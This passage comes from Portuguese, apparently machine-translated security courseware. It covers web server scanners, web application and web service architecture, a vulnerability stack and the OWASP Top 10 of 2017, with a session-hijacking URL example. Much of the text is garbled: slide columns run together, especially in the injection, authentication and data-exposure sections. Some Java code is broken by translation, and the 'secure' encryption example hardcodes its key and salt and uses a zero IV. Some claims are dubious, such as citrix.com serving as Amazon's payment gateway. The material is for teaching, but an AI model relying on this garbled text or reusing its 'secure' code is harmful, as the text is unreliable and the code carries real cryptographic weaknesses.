Ferramentas de segurança do servidor da Web
O Fortify WebInspect é uma solução de teste dinâmico automatizado que descobre problemas de
Fortify WebInspect configuração e identifica e prioriza vulnerabilidades de segurança em aplicativos em execução
Acunetix Web Vulnerability Scanner

Retina Host Security Scanner

https:// www.beyondtrust.com
NetIQ Secure Configuration Manager

https:// www.netiq.com
SAINT Security Suite

https:// www.carson-saint.com
Sophos Intercept X for Server

https:// www.sophos.com
https:// www.microfocus.com
Ferramentas de segurança do servidor da Web
ÿ Fortify WebInspect
Fonte: https:// www.microfocus.com
O Fortify WebInspect é uma solução automatizada de teste dinâmico que descobre
problemas de configuração, bem como identifica e prioriza vulnerabilidades de segurança
em aplicativos em execução. Ele imita as técnicas de hacking do mundo real e fornece uma
análise dinâmica abrangente de aplicativos e serviços da web complexos. Os painéis e
relatórios do WebInspect fornecem às organizações visibilidade e uma postura de risco
precisa de seus aplicativos.

Figura 7.17: captura de tela do Fortify WebInspect
A seguir estão algumas ferramentas adicionais de segurança do servidor web:
ÿ Acunetix Web Vulnerability Scanner (https:// www.acunetix.com)

ÿ Retina Host Security Scanner (https:// www.beyondtrust.com)
ÿ NetIQ Secure Configuration Manager (https:// www.netiq.com)
ÿ SAINT Security Suite (https:// www.carson-saint.com)
ÿ Sophos Intercept X for Server (https:// www.sophos.com)

Aplicativo Web
Ataques
Ataques de aplicativos da Web

Com as vulnerabilidades e ataques cibernéticos cada vez maiores em aplicativos da Web, juntamente
com as técnicas avançadas e a natureza desses ataques, as organizações e os profissionais de
segurança precisam reavaliar sua abordagem na proteção de aplicativos da Web. Esta seção discute
os conceitos de aplicativos da web e vários tipos de ameaças e ataques contra as vulnerabilidades
dos aplicativos da web.

Fluxo do módulo
Discutir aplicativo da Web

Ameaças e Ataques
2
Entenda o aplicativo da Web
Arquitetura e Vulnerabilidade
Pilha
1 3 Discutir aplicativo da Web
Entenda a arquitetura de aplicativos da Web e a pilha de vulnerabilidades

Esta seção descreve os conceitos básicos associados aos aplicativos da Web em relação às questões de
segurança — seus componentes, como funcionam, sua arquitetura e assim por diante. Além disso, fornece
informações sobre serviços da Web e pilhas de vulnerabilidades.

Introdução aos aplicativos da Web
ÿ Os aplicativos da Web fornecem uma interface entre os usuários finais e

os servidores da Web por meio de um conjunto de páginas da Web que
são geradas na extremidade do servidor ou contêm código de script a ser
executado dinamicamente no navegador da Web do cliente
ÿ Embora os aplicativos da Web imponham certas políticas de segurança,

eles são vulneráveis a vários ataques, como injeção de SQL, script entre
sites e seqüestro de sessão
Introdução aos aplicativos da Web
Aplicativos da Web são programas de software executados em navegadores da Web e atuam como interface
entre usuários e servidores da Web por meio de páginas da Web. Eles permitem que os usuários solicitem,
enviem e recuperem dados de/para um banco de dados pela Internet, interagindo por meio de uma interface
gráfica de usuário (GUI) amigável. Os usuários podem inserir dados por meio de um teclado, mouse ou interface
de toque, dependendo do dispositivo que estão usando para acessar o aplicativo da web. Com base em
linguagens de programação suportadas pelo navegador, como JavaScript, HTML e CSS, os aplicativos da Web
funcionam em combinação com outras linguagens de programação, como SQL, para acessar dados dos bancos de dados.
Os aplicativos da Web são desenvolvidos como páginas da Web dinâmicas e permitem que os usuários se
comuniquem com servidores usando scripts do lado do servidor. Eles permitem que os usuários executem
tarefas específicas, como pesquisar, enviar e-mails, conectar-se com amigos, fazer compras on-line e rastrear e rastrear.
Além disso, existem vários aplicativos de desktop que fornecem aos usuários a flexibilidade de trabalhar com a
Internet.
As entidades desenvolvem diversas aplicações web para oferecer seus serviços aos usuários via Internet.
Sempre que os usuários precisarem acessar tais serviços, eles podem solicitá-los enviando o Uniform Resource
Identifier (URI) ou Uniform Resource Locator (URL) do aplicativo da web em um navegador. O navegador passa
essa solicitação ao servidor, que armazena os dados do aplicativo da Web e os exibe no navegador. Alguns
servidores web populares são Microsoft IIS, Apache HTTP Server, H2O, LiteSpeed, etc.
O aumento do uso da Internet e a expansão dos negócios on-line aceleraram o desenvolvimento e a onipresença
de aplicativos da Web em todo o mundo. Um fator-chave na adoção de aplicativos da Web para fins comerciais
é a multiplicidade de recursos que eles oferecem. Além disso, eles são seguros e relativamente fáceis de
desenvolver. Além disso, eles oferecem melhores serviços do que muitos aplicativos de software baseados em
computador e são fáceis de instalar, manter e atualizar.

As vantagens dos aplicativos da web estão listadas abaixo:
ÿ Por serem independentes do sistema operacional, seu desenvolvimento e

solução de problemas são fáceis e econômicos.
ÿ Eles são acessíveis a qualquer hora e em qualquer lugar usando um computador com Internet
conexão.
ÿ A interface do usuário é personalizável, facilitando a atualização.
ÿ Os usuários podem acessá-los em qualquer dispositivo com um navegador de Internet, incluindo PDAs,
smartphones, etc
ÿ Servidores dedicados, monitorados e gerenciados por administradores de servidores experientes, armazenam todos
os dados de aplicações web, permitindo aos desenvolvedores aumentar sua capacidade de carga de trabalho.
ÿ Vários locais de servidores não apenas aumentam a segurança física, mas também reduzem o
fardo de monitorar milhares de desktops usando o programa.
ÿ Eles usam tecnologias centrais flexíveis, como JSP, Servlets, Active Server Pages, SQL Server, .NET
e linguagens de script, que são escaláveis e suportam até mesmo plataformas portáteis.
Embora os aplicativos da Web imponham determinadas políticas de segurança, eles são vulneráveis a vários
ataques, como injeção de SQL, script entre sites e seqüestro de sessão.

Como funcionam os aplicativos da Web
http://certifiedhacker.com/?
id=6329&print=Y
Formulário de login do usuário Internet Firewall Servidor web
Chamadas do sistema operacional
Sistema operacional DBMS servidor de aplicativos da web
EU IRIA
Tópico Notícia
6329 tecnologia CNN SELECT * de notícias onde id = 6329

Saída
Como funcionam os aplicativos da Web
A principal função dos aplicativos da web é buscar dados solicitados pelo usuário de um banco de dados. Quando
um usuário clica ou insere um URL em um navegador, o aplicativo da web exibe imediatamente o conteúdo do
site solicitado no navegador.
Esse mecanismo envolve as seguintes etapas:

ÿ
Primeiro, o usuário insere o nome do site ou URL no navegador. Em seguida, a solicitação do usuário é
enviada ao servidor web.
ÿ Ao receber a solicitação, o servidor web verifica a extensão do arquivo:
o Se o usuário solicitar uma página da Web simples com uma extensão HTM ou HTML, o servidor da
Web processará a solicitação e enviará o arquivo para o navegador do usuário.
o Se o usuário solicitar uma página da Web com uma extensão que precise ser processada no lado do
servidor, como php, asp e cfm, o servidor de aplicativos da Web deverá processar a solicitação.
ÿ Portanto, o servidor web passa a solicitação do usuário para o servidor de aplicativos web,
que processa a solicitação do usuário.
ÿ O servidor de aplicativos da web acessa o banco de dados para executar a tarefa solicitada
atualizando ou recuperando as informações nele armazenadas.
ÿ Depois de processar a solicitação, o servidor de aplicativos web finalmente envia os resultados para o
servidor web, que por sua vez envia os resultados para o navegador do usuário.

Figura 7.18: Funcionamento de aplicações web

Arquitetura de aplicativo da Web

Internet
Rede
Serviços
clientes Camada de negócios
navegador da web
Servidor de aplicação
Apresentação
Camada
Java C# Rubi
HTML, CSS, O negócio
Web Externa
telefones inteligentes, JavaScript Lógica
Serviços PHP PythonJavaScript
Dispositivo Web
Aplicativo herdado
Acesso de dados
Servidor web
Camada de apresentação
Firewall Camada de banco de dados

Servidor proxy,
Analisador de Solicitação HTTP
Cache
Serviços na nuvem
Servlet Recurso Autenticação Servidor de banco de dados
Recipiente Manipulador e Entrar B2B
Arquitetura de aplicativo da Web
Os aplicativos da Web são executados em navegadores da Web e usam um conjunto de scripts do lado do servidor (Java, C#, Ruby, PHP
etc.) e scripts do lado do cliente (HTML, JavaScript etc.) para executar o aplicativo. O funcionamento do aplicativo web depende de sua
arquitetura, que inclui hardware e software que executam tarefas como ler a solicitação, pesquisar, coletar e exibir os dados necessários.
A arquitetura do aplicativo da web inclui diferentes dispositivos, navegadores da web e serviços da web externos que funcionam com
diferentes linguagens de script para executar o aplicativo da web. É composto por três camadas:
1. Cliente ou camada de apresentação
2. Camada de lógica de negócios
3. Camada de banco de dados
A camada de cliente ou apresentação inclui todos os dispositivos físicos presentes no lado do cliente, como laptops, smartphones e
computadores. Esses dispositivos apresentam sistemas operacionais e navegadores compatíveis, que permitem aos usuários enviar
solicitações para os aplicativos da web necessários. O usuário solicita um site inserindo uma URL no navegador e a solicitação viaja para o
servidor da web. O servidor web então responde à solicitação e busca os dados solicitados; o aplicativo finalmente exibe essa resposta no
navegador na forma de uma página da web.
A própria camada de “lógica de negócios” consiste em duas camadas: a camada de lógica do servidor web e a camada de lógica de
negócios. A camada lógica do servidor web contém vários componentes, como um firewall, um analisador de solicitação HTTP, um servidor
proxy de cache, um manipulador de autenticação e login, um manipulador de recursos e um componente de hardware, por exemplo, um
servidor. O firewall oferece segurança ao conteúdo, o analisador de requisições HTTP trata das requisições vindas dos clientes e encaminha
as respostas para eles,

e o manipulador de recursos é capaz de lidar com várias solicitações simultaneamente. A camada lógica do
servidor web contém código que lê dados do navegador e retorna os resultados (por exemplo, IIS Web Server,
Apache Web Server).
A camada de lógica de negócios inclui a lógica funcional do aplicativo da Web, que é implementada usando
tecnologias como .NET, Java e “middleware”. Ele define o fluxo de dados, segundo o qual o desenvolvedor
constrói o aplicativo usando linguagens de programação. Ele armazena os dados do aplicativo e integra
aplicativos legados com a funcionalidade mais recente do aplicativo. O servidor precisa de um protocolo
específico para acessar os dados solicitados pelo usuário de seu banco de dados. Essa camada contém o
software e define as etapas para pesquisar e buscar os dados.
A camada de banco de dados consiste em serviços em nuvem, uma camada B2B que contém todas as
transações comerciais e um servidor de banco de dados que fornece os dados de produção de uma organização
de forma estruturada (por exemplo, MS SQL Server, servidor MySQL).
Figura 7.19: Arquitetura de aplicativo da Web

Serviços web
ÿ Um serviço web é um aplicativo ou software implantado
pela Internet e usa protocolos de mensagens padrão como
SOAP, UDDI, WSDL e REST para permitir a comunicação
entre aplicativos desenvolvidos para diferentes plataformas
Arquitetura de serviço da Web
Registro de serviço
(Contém Serviço
Descrições)
Ligar
Serviço Provedor de serviço

Solicitante (Contém Serviço e
Descrições do serviço)
Serviços web
Um serviço da Web é um aplicativo ou software implantado na Internet. Ele usa um protocolo de mensagens padrão
(como SOAP) para permitir a comunicação entre aplicativos desenvolvidos em diferentes plataformas. Por exemplo,
serviços baseados em Java podem interagir com aplicativos PHP.
Esses aplicativos baseados na web são integrados com SOAP, UDDI, WSDL e REST em toda a rede.
Arquitetura de serviço da Web
Uma arquitetura de serviço da Web descreve as interações entre o provedor de serviço, o solicitante de serviço e o
registro de serviço. Essas interações consistem em três operações, ou seja, publicar, localizar e vincular. Todas essas
funções e operações trabalham juntas em artefatos de serviço da Web conhecidos como módulos de software (serviços)
e suas descrições.
Os provedores de serviços oferecem serviços da web. Eles implantam e publicam descrições de serviço de um serviço
da Web em um registro de serviço. Os solicitantes localizam essas descrições no registro do serviço e as utilizam para
vincular-se ao provedor de serviço da web e invocar a implementação do serviço da web.
Existem três funções em um serviço da Web:
ÿ Provedor de Serviços: É uma plataforma de onde os serviços são prestados.
ÿ Solicitante de Serviço: É uma aplicação ou cliente que está buscando um serviço ou tentando estabelecer
comunicação com um serviço. Em geral, o navegador é um solicitante, que invoca o serviço em nome de um
usuário.
ÿ Cadastro de Serviços: É o local onde o provedor carrega as descrições dos serviços. O solicitante do serviço
descobre o serviço e recupera os dados de ligação das descrições do serviço.

Existem três operações em uma arquitetura de serviço da Web:
ÿ Publicar: Durante esta operação, as descrições de serviço são publicadas para permitir que o solicitante
para conhecer os serviços.
ÿ Encontrar: Durante esta operação, o solicitante tenta obter as descrições do serviço. Esta operação pode ser
processada em duas fases distintas: obtenção da descrição da interface do serviço em tempo de
desenvolvimento e obtenção das chamadas de descrição de ligação e localização em tempo de execução.
ÿ Bind: Durante esta operação, o solicitante chama e estabelece comunicação com os serviços durante o tempo
de execução, usando dados de vinculação dentro das descrições de serviço para localizar e invocar os serviços.
Existem dois artefatos em uma arquitetura de serviço da web:
ÿ Serviço: É um módulo de software oferecido pelo provedor de serviços pela Internet. Ele se comunica com os
solicitantes. Por vezes, também pode atuar como solicitante, invocando outros serviços em sua implementação.
ÿ Descrição do serviço: fornece detalhes da interface e detalhes da implementação do serviço. Consiste em todas
as operações, locais de rede, detalhes de ligação, tipos de dados, etc. Pode ser armazenado em um registro e
invocado pelo solicitante.
Figura 7.20: Arquitetura de Web Service
Componentes da arquitetura de serviço da Web:
ÿ UDDI: Universal Description, Discovery, and Integration (UDDI) é um serviço de diretório que
lista todos os serviços disponíveis.
ÿ WSDL: Web Services Description Language é uma linguagem baseada em XML que descreve e rastreia serviços
da web.
ÿ WS-Security: Web Services Security (WS-Security) desempenha um papel importante na proteção de serviços
da web. É uma extensão do SOAP e visa manter a integridade e confidencialidade das mensagens SOAP, bem
como autenticar os usuários.

Existem outros recursos/componentes importantes da arquitetura de serviço da Web, como WS Work Processes, WS-Policy e
WS Security Policy, que desempenham um papel importante na comunicação entre os aplicativos.
Características dos Web Services
ÿ Baseado em XML: os serviços da Web usam XML para representação e transporte de dados. O uso de XML pode evitar
vinculação de sistema operacional, rede ou plataforma. Os aplicativos que fornecem serviços da Web são altamente
interoperáveis.
ÿ Serviço granular: Nos serviços da Web, alguns objetos contêm uma grande quantidade de informações e oferecem maior
funcionalidade do que os serviços granulares. Um serviço de baixa granularidade é uma combinação de vários serviços
de baixa granularidade.
ÿ Acoplamento flexível: os serviços da Web oferecem suporte a uma abordagem de acoplamento flexível para sistemas de
interconexão. A interação entre os sistemas pode ocorrer via API web por meio do envio de mensagens XML. A API
web incorpora uma camada de abstração para a infraestrutura para tornar a conexão flexível e adaptável.
ÿ Suporte assíncrono e síncrono: Serviços síncronos são chamados por usuários que esperam por uma resposta,
enquanto serviços assíncronos são chamados por usuários que não esperam por uma resposta. Mensagens baseadas
em RPC e mensagens baseadas em documentos são frequentemente usadas para serviços da Web síncronos e
assíncronos. Endpoints síncronos e assíncronos são implementados usando servlets, SOAP/XML e HTTP.
ÿ Suporte RPC: os serviços da Web suportam chamadas de procedimento remoto (RPC) de forma semelhante ao tradicional
formulários.

Tipos de Web Services
serviços web SOAP serviços web RESTful
É baseado no formato XML e É baseado em um conjunto de restrições

é usado para transferir dados entre um usando conceitos HTTP subjacentes para
prestador de serviços e solicitante melhorar o desempenho
Tipos de Web Services
Os serviços da Web são de dois tipos:
ÿ Serviços Web SOAP
O Simple Object Access Protocol (SOAP) define o formato XML. O XML é usado para transferir dados entre o
provedor de serviços e o solicitante. Também determina o procedimento para construir serviços da web e
permite a troca de dados entre diferentes linguagens de programação.
ÿ Serviços Web RESTful
Os serviços da Web REpresentational State Transfer (RESTful) são projetados para tornar os serviços mais
produtivos. Eles usam muitos conceitos HTTP subjacentes para definir os serviços. É uma abordagem
arquitetônica em vez de um protocolo como o SOAP.

Pilha de Vulnerabilidade
Falhas de Lógica de Negócios

Aplicativos da Web personalizados Camada 7
Vulnerabilidades técnicas
Componentes de terceiros Camada 6 Código Aberto / Comercial
Servidor web Camada 5
Base de dados Oracle / MySQL / MSSQL

Camada 4
Sistema operacional Windows/Linux/macOS

Camada 3
Rede Roteador / Switch

Camada 2
Segurança IP/IDS
Camada 1
Pilha de Vulnerabilidade
Um mantém e acessa aplicativos da web em vários níveis que incluem aplicativos da web personalizados,
componentes de terceiros, bancos de dados, servidores da web, sistemas operacionais, redes e
segurança. Todos os mecanismos ou serviços empregados em cada camada permitem ao usuário
acessar a aplicação web com segurança. Ao considerar os aplicativos da Web, a organização considera
a segurança como um componente crítico porque os aplicativos da Web são as principais fontes de
ataques. A pilha de vulnerabilidade mostra várias camadas e os elementos/mecanismos/serviços
correspondentes que tornam os aplicativos da web vulneráveis.
Figura 7.21: Pilha de Vulnerabilidade

Os invasores exploram as vulnerabilidades de um ou mais elementos entre os sete níveis para obter acesso
irrestrito a um aplicativo ou a toda a rede.
ÿ Camada 7: Se um invasor encontrar vulnerabilidades na lógica de negócios (implementada usando

linguagens como .NET e Java), ele poderá explorar essas vulnerabilidades executando ataques de
validação de entrada, como XSS.
ÿ Camada 6: Componentes de terceiros são serviços que se integram ao site para obter determinada
funcionalidade (por exemplo, Amazon.com visado por um invasor é o site principal; citrix.com é um site
de terceiros).
Quando os clientes escolhem um produto para comprar, eles clicam no botão Comprar/Finalizar
Compra. Isso os redireciona para sua conta bancária on-line por meio de um gateway de pagamento.
Sites de terceiros, como citrix.com, oferecem esses gateways de pagamento. Os invasores podem
explorar esse redirecionamento e usá-lo como um meio/caminho para entrar na Amazon.com e explorá-lo.
ÿ Camada 5: servidores Web são programas de software que hospedam sites. Quando os usuários
acessam um site, eles enviam uma solicitação de URL ao servidor da web. O servidor analisa essa
solicitação e responde com uma página da Web que aparece no navegador. Os invasores podem
executar a pegada em um servidor da web que hospeda o site de destino e capturar banners que
contêm informações como o nome do servidor da web e sua versão. Eles também podem usar
ferramentas como o Nmap para coletar essas informações. Em seguida, eles podem começar a
procurar por vulnerabilidades publicadas no banco de dados CVE para esse servidor da web específico
ou número de versão do serviço e explorar qualquer um que encontrarem.
ÿ Camada 4: Bancos de dados armazenam informações confidenciais do usuário, como IDs de usuário,
senhas, números de telefone e outros detalhes. Pode haver vulnerabilidades no banco de dados do
site de destino. Essas vulnerabilidades podem ser exploradas por invasores usando ferramentas como
sqlmap para obter controle do banco de dados do alvo.
ÿ Camada 3: Os invasores verificam um sistema operacional para encontrar portas abertas e

vulnerabilidades e desenvolvem vírus/backdoors para explorá-los. Eles enviam malware pelas portas
abertas para a máquina de destino; ao executar esse malware, eles podem comprometer a máquina e
obter controle sobre ela. Mais tarde, eles tentam acessar os bancos de dados do site de destino.
ÿ Camada 2: Roteadores/switches direcionam o tráfego de rede apenas para máquinas específicas. Os

invasores inundam esses switches com inúmeras solicitações que esgotam a tabela CAM, fazendo
com que ela se comporte como um hub. Em seguida, eles se concentram no site de destino farejando
dados (na rede), que podem incluir credenciais ou outras informações pessoais.
ÿ Camada 1: IDS e IPS disparam alarmes se algum tráfego malicioso entrar em uma máquina ou servidor
de destino. Os invasores adotam técnicas de evasão para contornar esses sistemas, de modo que não
disparem nenhum alarme enquanto exploram o alvo.

Fluxo do módulo
Ameaças e Ataques
2
Pilha
1 3 Contramedidas de ataque
Discutir ameaças e ataques de aplicativos da Web

Os invasores tentam vários ataques no nível do aplicativo para comprometer a segurança dos
aplicativos da Web para cometer fraudes ou roubar informações confidenciais. Esta seção discute os
vários tipos de ameaças e ataques contra as vulnerabilidades dos aplicativos da web.

Os 10 principais riscos de segurança de aplicativos OWASP - 2017
A1 A2 A3 A4 A5
injeção Partido Dados sensíveis XML externo Acesso interrompido

Autenticação Exposição Entidade (XXE) Ao controle
A6 A7 A8 A9 A10
Segurança Entre sites Inseguro Usando Componentes Registro e

Configuração incorreta Scripts (XSS) Desserialização com Conhecido monitoramento insuficientes
Vulnerabilidades
https:// www.owasp.org
OWASP Top 10 Application Security Risks – 2017 Fonte: https://
www.owasp.org OWASP é uma organização internacional que especifica
as 10 principais vulnerabilidades e falhas de aplicativos da web. Os 10 principais riscos de segurança de aplicativos

OWASP mais recentes são os seguintes: ÿ A1 – Injeção
Falhas de injeção, como SQL, injeção de comando e injeção de LDAP, ocorrem quando dados não confiáveis
são enviados a um interpretador como parte de um comando ou consulta. Os dados hostis do invasor podem
induzir o intérprete a executar comandos indesejados ou acessar dados sem a devida autorização.
ÿ A2 – Autenticação Quebrada
As funções do aplicativo relacionadas à autenticação e ao gerenciamento de sessões geralmente são

implementadas incorretamente, permitindo que invasores comprometam senhas, chaves ou tokens de sessão
ou explorem outras falhas de implementação para assumir identidades de outros usuários (temporariamente
ou permanentemente).
ÿ A3 – Exposição de Dados Sensíveis
Muitos aplicativos da Web e APIs não protegem adequadamente dados confidenciais, como dados financeiros,
de saúde e informações de identificação pessoal (PII). Os invasores podem roubar ou modificar esses dados
mal protegidos para realizar fraudes de cartão de crédito, roubo de identidade ou outros crimes. Os dados
confidenciais requerem proteção extra, como criptografia em repouso ou em trânsito, bem como precauções
especiais quando trocados com o navegador.
ÿ A4 – Entidade Externa XML (XXE)
Muitos processadores XML mais antigos ou mal configurados avaliam referências de entidades externas em
documentos XML. Entidades externas podem divulgar arquivos internos usando o arquivo URI

manipulador, compartilhamentos internos de arquivos SMB em servidores Windows sem patch, verificação de
porta interna, execução remota de código e ataques de serviço DoS, como o ataque de bilhões de risadas.
ÿ A5 – Controlo de Acesso Quebrado
As restrições sobre o que os usuários autenticados podem fazer não são aplicadas corretamente.
Os invasores podem explorar essas falhas para acessar funcionalidades e/ou dados não autorizados, como
acessar contas de outros usuários, visualizar arquivos confidenciais, modificar dados de outros usuários e alterar
direitos de acesso.
ÿ A6 – Configuração incorreta de segurança
A configuração incorreta de segurança é o problema mais comum na segurança da Web, devido em parte à
configuração manual ou ad hoc (ou nenhuma configuração), configurações padrão inseguras, baldes S3 abertos,
cabeçalhos HTTP mal configurados, mensagens de erro contendo informações confidenciais e não aplicar patches
ou atualizar sistemas, estruturas, dependências e componentes em tempo hábil (ou de maneira alguma).
ÿ A7 – Cross-Site Scripting (XSS)
As falhas de XSS ocorrem sempre que um aplicativo inclui dados não confiáveis em uma nova página da Web
sem validação ou escape adequados, ou sempre que atualiza uma página da Web existente com dados fornecidos
pelo usuário usando uma API de navegador que pode criar JavaScript. O XSS permite que os invasores executem
scripts no navegador da vítima, que podem sequestrar sessões do usuário, desfigurar sites ou redirecionar o
usuário para sites maliciosos.
ÿ A8 – Desserialização Insegura
As falhas de desserialização insegura ocorrem quando um aplicativo recebe objetos serializados hostis. A
desserialização insegura leva à execução remota de código. Mesmo que as falhas de desserialização não
resultem na execução remota de código, os objetos serializados podem ser reproduzidos, adulterados ou
excluídos para falsificar usuários, conduzir ataques de injeção e elevar privilégios.
ÿ A9 – Utilização de Componentes com Vulnerabilidades Conhecidas
Componentes como bibliotecas, estruturas e outros módulos de software são executados com os mesmos
privilégios do aplicativo. Se um componente vulnerável for explorado, tal ataque pode facilitar a perda de dados
ou o controle do servidor. Aplicativos e APIs que usam componentes com vulnerabilidades conhecidas podem
minar as defesas de aplicativos e permitir vários ataques e impactos.
ÿ A10 – Registo e Monitorização Insuficientes
Registro e monitoramento insuficientes, juntamente com integração ausente ou ineficaz com resposta a incidentes,
permitem que os invasores ataquem ainda mais os sistemas, mantenham a persistência, mudem para mais
sistemas e adulterem, extraiam ou destruam dados. A maioria dos estudos de violação mostra que o tempo para
detectar uma violação é superior a 200 dias, geralmente por partes externas, em vez de processos internos ou
monitoramento.

ÿ Falhas de injeção são vulnerabilidades de aplicativos da web que permitem que dados não
A1 - Injeção confiáveis sejam interpretados e executados como parte de um comando ou consulta
Imperfeições
ÿ Os invasores exploram falhas de injeção construindo comandos maliciosos ou
consultas que resultam em perda ou corrupção de dados, falta de responsabilidade ou negação
de acesso
Envolve a injeção de
Envolve a injeção de
Comando código malicioso Envolve a injeção de
SQL LDAP
consultas SQL maliciosas em LDAP malicioso
injeção injeção por meio de um injeção
formulários de entrada do usuário afirmações
aplicativo da web
A1 - Falhas de Injeção
Falhas de injeção são vulnerabilidades de aplicativos da web que permitem que dados não confiáveis sejam
interpretados e executados como parte de um comando ou consulta. Os invasores exploram falhas de injeção
criando comandos ou consultas maliciosas que resultam em perda ou corrupção de dados, falta de responsabilidade
ou negação de acesso. Essas falhas prevalecem no código legado e geralmente são encontradas em consultas
SQL, LDAP e XPath. Eles podem ser facilmente descobertos por fuzzers e scanners de vulnerabilidade de aplicativos.
Os invasores injetam códigos, comandos ou scripts maliciosos nos portões de entrada de aplicativos da Web
defeituosos, de modo que os aplicativos interpretem e executem a entrada maliciosa recém-fornecida, o que, por
sua vez, permite que eles extraiam informações confidenciais. Ao explorar as falhas de injeção em aplicativos da
Web, os invasores podem facilmente ler, gravar, excluir e atualizar quaisquer dados (ou seja, relevantes ou
irrelevantes para esse aplicativo específico). Existem muitos tipos de falhas de injeção, algumas das quais são
discutidas abaixo:
ÿ SQL Injection: A injeção de SQL é a vulnerabilidade de site mais comum na Internet e é usada para
aproveitar as vulnerabilidades de entrada não validadas para passar comandos SQL por meio de um
aplicativo da Web para execução por um banco de dados de back-end. Nessa técnica, o invasor injeta
consultas SQL maliciosas no formulário de entrada do usuário para obter acesso não autorizado a um
banco de dados ou para recuperar informações diretamente do banco de dados.
ÿ Injeção de comando: os invasores identificam uma falha de validação de entrada em um aplicativo e

exploram a vulnerabilidade injetando um comando malicioso no aplicativo para executar comandos
arbitrários fornecidos no sistema operacional do host. Assim, tais falhas são extremamente perigosas.

ÿ Injeção de LDAP: A injeção de LDAP é um método de ataque no qual os sites que constroem
declarações LDAP a partir de entradas fornecidas pelo usuário são explorados para lançar
ataques. Quando um aplicativo não limpa a entrada do usuário, o invasor modifica a
instrução LDAP com a ajuda de um proxy local. Isso, por sua vez, resulta na execução de
comandos arbitrários, como conceder acesso a consultas não autorizadas e alterar o
conteúdo dentro da árvore LDAP.

A2 - Autenticação quebrada
ÿ Os invasores podem explorar vulnerabilidades nas funções de autenticação ou gerenciamento de sessão , como
contas expostas, IDs de sessão, logout, gerenciamento de senhas, tempos limite, etc. para representar usuários
ID da sessão em URLs Exploração de senha Exploração de tempo limite
http://www.certifiedhackershop.com/sa le/ ÿ Os invasores podem obter acesso ao banco de

ÿ
Se os tempos limite de um aplicativo não
saleitems=304;jsessionid=12OMTOIDP
XM0OQSABGCKLHCJUN2JV?dest=NewMexico dados de senhas de um aplicativo da web. forem definidos corretamente e um usuário
Se as senhas dos usuários não forem fechar o navegador sem sair de sites acessados
ÿ Os invasores farejam o tráfego de rede criptografadas, um invasor pode explorar a por meio de um computador público, um
ou enganar os usuários para obter IDs de senha de qualquer usuário invasor poderá usar o mesmo navegador
sessão e, em seguida, reutilizar esses IDs de posteriormente e explorar os privilégios
sessão para fins maliciosos desse usuário
A2 - Autenticação quebrada
Autenticação e gerenciamento de sessão inclui todos os aspectos da autenticação do usuário e gerenciamento de

sessões ativas. Atualmente, os aplicativos da Web que implementam autenticações sólidas falham devido a funções de
credenciais fracas, como “alterar minha senha”, “esqueci minha senha”, “lembrar minha senha”, “atualizar conta” e
assim por diante. Portanto, os desenvolvedores devem tomar o máximo cuidado para implementar a autenticação do
usuário com segurança. É sempre melhor usar métodos de autenticação fortes por meio de tokens criptográficos ou
biométricos baseados em software e hardware especiais. Um invasor explora vulnerabilidades nas funções de
autenticação ou gerenciamento de sessão, como contas expostas, IDs de sessão, logout, gerenciamento de senhas,
tempos limite, lembre-se de mim, pergunta secreta, atualização de conta e outros para se passar por usuários.
ÿ ID da sessão em URLs
o Exemplo:
Um aplicativo da web cria um ID de sessão para o respectivo login quando um usuário faz login em http://
certifiedhackershop.com. Um invasor usa um sniffer para detectar o cookie que contém o ID da sessão
ou engana o usuário para obter o ID da sessão. O invasor agora insere o seguinte URL na barra de
endereços do navegador:
http://certifiedhackershop.com/sale/saleitems=304;jsessionid=1
2OMTOIDPXM0OQSABGCKLHCJUN2JV?dest=NewMexico
Isso o redireciona para a página já conectada da vítima. O invasor se faz passar pela vítima com sucesso.

ÿ Exploração de Senha
Os invasores podem identificar senhas armazenadas em bancos de dados por causa de algoritmos de
hash fracos. Os invasores podem obter acesso ao banco de dados de senhas do aplicativo da Web se
as senhas dos usuários não forem criptografadas, o que permite que o invasor explore a senha de
todos os usuários.
ÿ Exploração de tempo limite
Se os tempos limite de sessão de um aplicativo forem definidos para durações maiores, as sessões
durarão até o tempo especificado, ou seja, a sessão será válida por um período maior. Quando o
usuário fecha o navegador sem sair de sites acessados por meio de um computador público, o invasor
pode usar o mesmo navegador posteriormente para realizar o ataque, pois os IDs das sessões podem
permanecer válidos; assim, eles podem explorar os privilégios do usuário.
o Exemplo:
Um usuário faz login em www.certifiedhacker.com usando suas credenciais. Depois de executar

determinadas tarefas, ele fecha o navegador da Web sem sair da página. O tempo limite da sessão
do aplicativo da web é definido para duas horas. Durante o intervalo de sessão especificado, se um
invasor tiver acesso físico ao sistema do usuário, ele poderá iniciar o navegador, verificar o histórico
e clicar no link www.certifiedhacker.com , que o redireciona automaticamente para a conta do
usuário sem a necessidade de insira as credenciais do usuário.

A3 - Exposição de dados confidenciais

Código de segurança
ÿ A exposição de dados confidenciais ocorre devido a falhas como
armazenamento criptográfico inseguro e vazamento de informações
private static String sKey = “zoooooooooom!!!!”;
private static String salt = “ooohhhhhhhhhh!!!!”;
ÿ Quando um aplicativo usa código de criptografia mal escrito para public static String criptografar(String plainText) {
criptografar e armazenar com segurança dados confidenciais no banco de byte[] iv = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
dados, um invasor pode explorar essa falha e roubar ou modificar dados IvParameterSpec ivspec = new IvParameterSpec(iv);
confidenciais mal protegidos , como números de cartões de crédito, Fábrica SecretKeyFactory = new
SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
SSNs e outras credenciais de autenticação
KeySpec = new PBEKeySpec(sKey.toCharArray(), salt.getBytes(), 65536, 256);
Chave SecretKey = factory.generateSecret(keySpec);
SecretKeySpec secretKey = new SecretKeySpec(key.getEncoded(), "AES");

Código Vulnerável
Cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
public String criptografar (String texto simples) {
cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivspec);
texto simples = texto simples.replace(“a”,”z”);
byte[] utf8text = texto simples.getBytes(“UTF-8”);
texto simples = texto simples.replace(“b”,”y”);
byte[]enryptedText = cipher.doFinal(utf8text);
---------------
return Base64Encoder.encodeToString(encryptedText); }
return Base64Encoder.encode(plainText); }
A3 - Exposição de dados confidenciais
Os aplicativos da Web precisam armazenar informações confidenciais, como senhas, números de cartão de crédito,
registros de contas ou outras informações de autenticação em um banco de dados ou em um sistema de arquivos. Se os
usuários não mantiverem a segurança adequada de seus locais de armazenamento, o aplicativo poderá estar em risco,
pois os invasores podem acessar o armazenamento e usar indevidamente as informações.
